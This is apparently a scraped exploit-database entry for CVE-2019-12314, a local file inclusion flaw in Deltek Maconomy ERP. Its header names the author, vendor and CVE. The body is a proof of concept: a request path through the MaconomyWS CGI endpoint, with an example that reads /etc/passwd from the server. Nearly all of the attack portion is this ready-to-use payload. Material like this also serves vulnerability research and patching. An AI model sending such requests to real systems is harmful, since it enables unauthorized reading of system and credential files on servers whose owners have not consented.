13 lines
No EOL
416 B
Text
13 lines
No EOL
416 B
Text
# Exploit Title: Maconomy Erp local file include
|
|
# Date: 22/05/2019
|
|
# Exploit Author: JameelNabbo
|
|
# Website: jameelnabbo.com
|
|
# Vendor Homepage: https://www.deltek.com
|
|
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
|
|
# CVE: CVE-2019-12314
|
|
POC:
|
|
|
|
POC:
|
|
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
|
|
Example
|
|
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd |